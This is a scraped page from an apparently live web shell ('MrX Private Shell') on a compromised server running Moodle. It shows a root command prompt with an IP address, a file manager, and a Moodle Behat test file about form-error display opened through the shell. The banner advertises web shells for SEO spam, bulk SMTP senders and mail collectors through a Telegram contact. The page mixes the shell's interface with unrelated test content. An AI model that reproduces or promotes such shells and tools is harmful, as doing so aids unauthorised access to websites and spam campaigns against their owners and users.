__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.216.174: ~ $
@javascript @theme_boost
Feature: Form errors only display after submit or change in Boost theme
  In order to have a more accessible way to display form errors
  As anyone
  I need to see errors only after I submit the form or change a field

  Background:
    Given the following "courses" exist:
      | fullname | shortname |
      | Course 1 | C1        |

  Scenario: Form error appears after submit, but not after just tabbing through
    When I log in as "admin"
    And I navigate to "Courses > Add a new course" in site administration
    And I click on "Course full name" "field"
    And I press the tab key
    Then I should not see "Missing full name"
    And I press "Save and display"
    And I should see "Missing full name"
    And the focused element is "Course full name" "field"

  Scenario: Form error appears immediately after change
    When I am on the "C1" "course editing" page logged in as "admin"
    And I set the field "Course full name" to ""
    And I press the tab key
    Then I should see "Missing full name"
    And the focused element is "Course full name" "field"

Filemanager

Name Type Size Permission Actions
addblock.feature File 1.67 KB 0644
behat_theme_boost_behat_navigation.php File 4.25 KB 0644
blacklist.json File 483 B 0644
breadcrumb.feature File 4.39 KB 0644
category_role_assignment.feature File 1.74 KB 0644
contextmenu.feature File 1.06 KB 0644
course_reuse.feature File 2.05 KB 0644
formerrors.feature File 1.08 KB 0644
languagemenu.feature File 3.87 KB 0644
mycoursesblocks.feature File 1.42 KB 0644
primarynav.feature File 5.56 KB 0644
regionmainsettingsmenu.feature File 1.21 KB 0644
reset_tour.feature File 1.18 KB 0644
settingstabs.feature File 948 B 0644
theme_selector.feature File 1.4 KB 0644
tour_filter.feature File 2.01 KB 0644
welcome_to_moodle.feature File 1.54 KB 0644
Filemanager